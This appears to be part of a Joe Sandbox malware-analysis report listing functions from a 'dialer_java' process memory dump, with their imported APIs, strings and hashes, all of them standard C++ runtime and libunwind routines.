Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: OnceValue$ExecuteInitcallocmemset
String ID: cannot allocate __cxa_eh_globals$execute once failure in __cxa_get_globals_fast()$std::__libcpp_tls_set failure in __cxa_get_globals()
API String ID: 2044551959-1509371760
Opcode ID: f1f45e0f00f5ce3d31606f51eb7ee3d72e9977eaa92f880a2da06ea4c8e6213e
Instruction ID: cd6bee4a667ddb5daeceed356962c72a747a331ba05b691b0c1ce53dbf002221
Opcode Fuzzy Hash: f1f45e0f00f5ce3d31606f51eb7ee3d72e9977eaa92f880a2da06ea4c8e6213e
Instruction Fuzzy Hash: 47012420E1A20782FE70BB11E9512B412D0EF90F44F402AB9D80DC63A2EF2DBD8D8308

Function 00007FF695DC8880 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF695DC88A8
fflush.MSVCRT ref: 00007FF695DC88ED

Strings

LIBUNWIND_PRINT_APIS, xrefs: 00007FF695DC88A1
libunwind: __unw_get_proc_info(cursor=%p, &info=%p), xrefs: 00007FF695DC88CE

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: fflushgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_get_proc_info(cursor=%p, &info=%p)
API String ID: 1137233558-1935908800
Opcode ID: e8ba0983abbb9daa666b015af6d5d3ea47504ba357e157cfbd2d07a602640b6c
Instruction ID: 8a620e25650a639af494351aad3105acbb4493cf5fdff7a9d42b6a6c2cddea98
Opcode Fuzzy Hash: e8ba0983abbb9daa666b015af6d5d3ea47504ba357e157cfbd2d07a602640b6c
Instruction Fuzzy Hash: 3A01A910E1969241FB389726FA047B516D0DF44F80F0811BAC90ED73A1DE6DAE8D8309

Function 00007FF695DC18B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

abort.MSVCRT(00000000,00000000,00000000,?,00007FF695DC1C09), ref: 00007FF695DC19EF
_assert.MSVCRT ref: 00007FF695DC1A08

Strings

(base != 0) && "DW_EH_PE_datarel is invalid with a base of 0", xrefs: 00007FF695DC19F4
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp, xrefs: 00007FF695DC19FB

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: _assertabort
String ID: (base != 0) && "DW_EH_PE_datarel is invalid with a base of 0"$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp
API String ID: 1072228434-1306384422
Opcode ID: 55f8dda17198795800073456670580f640aef58b898c353accad96664cddbd08
Instruction ID: 5912805908ef33a2c0f9f2349d27e3abd3eaab277bae84336cba283b5d69ceee
Opcode Fuzzy Hash: 55f8dda17198795800073456670580f640aef58b898c353accad96664cddbd08
Instruction Fuzzy Hash: 01014B22E0E626C0FD769784D54117852C4EF14F90F4926B5CE2DDA281EF3DFE4D8249

Function 00007FF695DDB380 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DDB3E6
memcpy.MSVCRT ref: 00007FF695DDB400
_assert.MSVCRT ref: 00007FF695DDB42A

Strings

basi, xrefs: 00007FF695DDB39A
basic_istream, xrefs: 00007FF695DDB385

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: _assertmemcpyrealloc
String ID: basi$basic_istream
API String ID: 2326172077-1189760207
Opcode ID: f31d0bfda383c1b6082b963be46f988af25024c433917d3f22b798f058380b77
Instruction ID: a06978c2071bb2557cbfe57c5450048e47451ba7066e7e5ef3fae7e4b902d7a9
Opcode Fuzzy Hash: f31d0bfda383c1b6082b963be46f988af25024c433917d3f22b798f058380b77
Instruction Fuzzy Hash: CB0184E2F0565282EA748B05F540779A2D1DB14BC4F44A175CA5D4BA81EF2CE9558B04

Function 00007FF695DDB38E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DDB3E6
memcpy.MSVCRT ref: 00007FF695DDB400
_assert.MSVCRT ref: 00007FF695DDB42A

Strings

basic_iostream, xrefs: 00007FF695DDB393
basi, xrefs: 00007FF695DDB39A

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: _assertmemcpyrealloc
String ID: basi$basic_iostream
API String ID: 2326172077-3201662033
Opcode ID: 1823fbeb78b408ddb3383061037edbd1725e6bbaf58f914d64ac0c32d595fd86
Instruction ID: 7cd3d15d17c4661595b247099b2fcfe6c23192f42b8e59c97ffc02327171100a
Opcode Fuzzy Hash: 1823fbeb78b408ddb3383061037edbd1725e6bbaf58f914d64ac0c32d595fd86
Instruction Fuzzy Hash: 91F08FE2F0265282EA748B05F640779A691EB18BC8F44A171CA5D4BB81EE2CD9998704

Function 00007FF695DC8920 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF695DC8944
fflush.MSVCRT ref: 00007FF695DC8986

Strings

LIBUNWIND_PRINT_APIS, xrefs: 00007FF695DC893D
libunwind: __unw_resume(cursor=%p), xrefs: 00007FF695DC896A

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: fflushgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_resume(cursor=%p)
API String ID: 1137233558-227906034
Opcode ID: ad86456c92fa133b36f51f89e8403052f5c7942e73ceb2515f9f788c2fc91f6d
Instruction ID: 650bfcb66fb765908a3420273d2b59f8ca6f3d596966c9b8c9816a91ed50d39a
Opcode Fuzzy Hash: ad86456c92fa133b36f51f89e8403052f5c7942e73ceb2515f9f788c2fc91f6d
Instruction Fuzzy Hash: E7017110E1D55641FB345716FA1427856D0DF56F80F0512B9C90ED73A1DE5DAD8DC305

Function 00007FF695DC87F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF695DC8814
fflush.MSVCRT ref: 00007FF695DC8856

Strings

libunwind: __unw_step(cursor=%p), xrefs: 00007FF695DC883A
LIBUNWIND_PRINT_APIS, xrefs: 00007FF695DC880D

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: fflushgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_step(cursor=%p)
API String ID: 1137233558-3760164396
Opcode ID: acbbefe464539abcaef1fe244cec8c422293ae8429e0ab9e7db6b12012d7a983
Instruction ID: 0fef04e643ad4e4cef8116e6e688edb6247e84431c9cf695db9eb3629fd56546
Opcode Fuzzy Hash: acbbefe464539abcaef1fe244cec8c422293ae8429e0ab9e7db6b12012d7a983
Instruction Fuzzy Hash: D801AD00E0E29A41FB349722FA002B85AD0DF55F80F0462BACC0EE7791DE6DAD8DC309

Function 00007FF695DC3ED0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

fflush.MSVCRT ref: 00007FF695DC3F11
RaiseException.KERNEL32(?,?,?,00000030,00007FF695DC2F54), ref: 00007FF695DC3F37

Strings

CCG , xrefs: 00007FF695DC3F2A
libunwind: _Unwind_RaiseException(ex_obj=%p), xrefs: 00007FF695DC3EF5

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: ExceptionRaisefflush
String ID: CCG $libunwind: _Unwind_RaiseException(ex_obj=%p)
API String ID: 3404444629-1152080672
Opcode ID: ce7a8e6c7a6e572c481f42ceb0385a3df82124a6507f1b87121b6176e540b98d
Instruction ID: 359a0a50000f9d23206b054c518e94e8536517825a100ef697903f77a809a519
Opcode Fuzzy Hash: ce7a8e6c7a6e572c481f42ceb0385a3df82124a6507f1b87121b6176e540b98d
Instruction Fuzzy Hash: 25F0A410A1869542FA39A765B5022F453B1EF85B91F006275ED4D83791EE2D9ACA8304

Function 00007FF695DC2C20 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF695DC2C46
GetProcAddress.KERNEL32 ref: 00007FF695DC2C56

Strings

_localtime64_s, xrefs: 00007FF695DC2C4C
msvcrt.dll, xrefs: 00007FF695DC2C3F

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: _localtime64_s$msvcrt.dll
API String ID: 1646373207-3474473506
Opcode ID: e6433b476ba74e81b9775fec21bde56a003506d6abc8a6f67e439d4aff4a0d78
Instruction ID: 1e233a1f7071b6acf2e095c40083394f7c6ed05e10f66ebfe81c19a2a308868a
Opcode Fuzzy Hash: e6433b476ba74e81b9775fec21bde56a003506d6abc8a6f67e439d4aff4a0d78
Instruction Fuzzy Hash: 02F05E20B0AA4290EE25CB02FD504B463E1EF45F81F4066B6DC4EC3364EE2CED8D9304

Function 00007FF695DC2BB0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF695DC2BD6
GetProcAddress.KERNEL32 ref: 00007FF695DC2BE6

Strings

_localtime64_s, xrefs: 00007FF695DC2BDC
msvcrt.dll, xrefs: 00007FF695DC2BCF

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: _localtime64_s$msvcrt.dll
API String ID: 1646373207-3474473506
Opcode ID: 996eddf4707004b26ca684804fcf8aaff092c600e71e1cc29f878679b6fdd581
Instruction ID: f6a195325bd97742d89435d5f20a9533433f97197374b0474143ab9878d4729d
Opcode Fuzzy Hash: 996eddf4707004b26ca684804fcf8aaff092c600e71e1cc29f878679b6fdd581
Instruction Fuzzy Hash: 38F03A20B0AA4290EE25CB02FD504B463E1EF45F81F4066B6DC4EC3364EE2CA98D9304

Function 00007FF695DE2710 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF695DE271B
GetProcAddress.KERNEL32 ref: 00007FF695DE272B

Strings

kernel32.dll, xrefs: 00007FF695DE2714
GetSystemTimePreciseAsFileTime, xrefs: 00007FF695DE2721

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
API String ID: 1646373207-706389432
Opcode ID: b448c299ad2c04bb2e5eec51baedb771711474971e5995f939cc9f046a9944f1
Instruction ID: 30bc495c1143231d98cfaa76b1c35cd7f6bfd73c283d379c14a8517026ecc316
Opcode Fuzzy Hash: b448c299ad2c04bb2e5eec51baedb771711474971e5995f939cc9f046a9944f1
Instruction Fuzzy Hash: 71E01224E1AA03C0EE659B11FC4013023E0EF44F04F8066F9C80E83360EF2CA98D8304

Function 00007FF695DE2CD0 Relevance: 6.4, APIs: 5, Instructions: 141COMMON

Download Yara Rule

APIs

LeaveCriticalSection.KERNEL32 ref: 00007FF695DE2D71
LeaveCriticalSection.KERNEL32 ref: 00007FF695DE2DAA
free.MSVCRT ref: 00007FF695DE2E1D
LeaveCriticalSection.KERNEL32 ref: 00007FF695DE2E46

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: CriticalLeaveSection$free
String ID:
API String ID: 2017658852-0
Opcode ID: 21f2af2da6d99c8440ba50e04c259726af40d8d037963cadd681417a98c49a5a
Instruction ID: 11739fa539764e48d65d125531c94c9dc041957ffff3a370061687bba4186097
Opcode Fuzzy Hash: 21f2af2da6d99c8440ba50e04c259726af40d8d037963cadd681417a98c49a5a
Instruction Fuzzy Hash: 9A518A31E18A0780FE348B05AA55375A2D1EF06F94F0826B5CA0D877A1DE7CEC8DC248

Function 00007FF695DCDC20 Relevance: 6.4, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00007FF695DCDC93
memcpy.MSVCRT ref: 00007FF695DCDCC4
free.MSVCRT ref: 00007FF695DCDD7E
memcpy.MSVCRT ref: 00007FF695DCDDAF
free.MSVCRT ref: 00007FF695DCDDF8

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: free$memcpy
String ID:
API String ID: 4107583993-0
Opcode ID: 8e1b853cacffe1525c6de4d4fc907dd5a3da612f1d84b0e28030ca1136726b77
Instruction ID: fa6b48658ce010ad6bba8e3da5cbe9dc53fd5c5a16fef791fe1683ef17ae00f9
Opcode Fuzzy Hash: 8e1b853cacffe1525c6de4d4fc907dd5a3da612f1d84b0e28030ca1136726b77
Instruction Fuzzy Hash: 09512DB3605B9586DA74CB15F9885AEB3B8F744B84F115235CB9E83B60EF38E495C300

Function 00007FF695DCABE0 Relevance: 6.3, APIs: 5, Instructions: 53COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00007FF695DCAC20
free.MSVCRT ref: 00007FF695DCAC38
free.MSVCRT ref: 00007FF695DCAC50
free.MSVCRT ref: 00007FF695DCAC68
free.MSVCRT ref: 00007FF695DCACAB

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 77491b3431e31e0df476f0c4b973149adff1a1b304b4d0bc1a179ca6df4f626d
Instruction ID: b5f7582ed33f27816d7b3f339167fea6f9553b1d6a892af366e82e233b5617f1
Opcode Fuzzy Hash: 77491b3431e31e0df476f0c4b973149adff1a1b304b4d0bc1a179ca6df4f626d
Instruction Fuzzy Hash: 0911332AE0A68646ED799625E1901FD93E0EF44B80F481671DB5F86790DF2CEE8AC304

Function 00007FF695DCD5C0 Relevance: 6.3, APIs: 4, Instructions: 273COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF695DCD703
memcpy.MSVCRT ref: 00007FF695DCD722
malloc.MSVCRT ref: 00007FF695DCD7C0

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: malloc$memcpy
String ID:
API String ID: 3800483350-0
Opcode ID: 02b9ae5a013ee2f29f00789c869f89056a85886b2e4cff7aeeaac901525a1d51
Instruction ID: acdcdbf161c30544cc6cb4e6e6c4637006c00dd764dc36f3ce8984fbee7c6ae2
Opcode Fuzzy Hash: 02b9ae5a013ee2f29f00789c869f89056a85886b2e4cff7aeeaac901525a1d51
Instruction Fuzzy Hash: C0A1C762A0AB8645EE719B15E80027977D0EB45F90F485672CF8D47B91EF3CE98AC708

Function 00007FF695DC64F0 Relevance: 6.2, APIs: 4, Instructions: 241COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF695DC65A4

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 06bcf27b9f9da240dc0868757c2916d576c3230e37a736bb9f8626e71eb8801a
Instruction ID: 5bd7d623ac8c3e60fbfe1b093095fdb455497322ba398021a951b48730000cfb
Opcode Fuzzy Hash: 06bcf27b9f9da240dc0868757c2916d576c3230e37a736bb9f8626e71eb8801a
Instruction Fuzzy Hash: 5C918F72A142428BEB348A2EF15476976E1EB24F94F14A275CB5AC7BC0DF3CE845CB04

Function 00007FF695DE0F70 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF695DE1024

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 3c04a9d5fa0e69046c5dc2e7c457146978f8f163ab23e189bd4247a93fbb4af8
Instruction ID: 49dc3b0a44d0e3d572ee4a444882395749d3cfe5c5a5df9a019a6117bfd9091d
Opcode Fuzzy Hash: 3c04a9d5fa0e69046c5dc2e7c457146978f8f163ab23e189bd4247a93fbb4af8
Instruction Fuzzy Hash: A091B432F052868BF7358A9AD941779B6E1EB14F94F04A275CB5AC7781CE2CF88D8704

Function 00007FF695DDF3D0 Relevance: 6.2, APIs: 4, Instructions: 186COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DDF46E
realloc.MSVCRT ref: 00007FF695DDF4B5
realloc.MSVCRT ref: 00007FF695DDF532
realloc.MSVCRT ref: 00007FF695DDF5ED

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
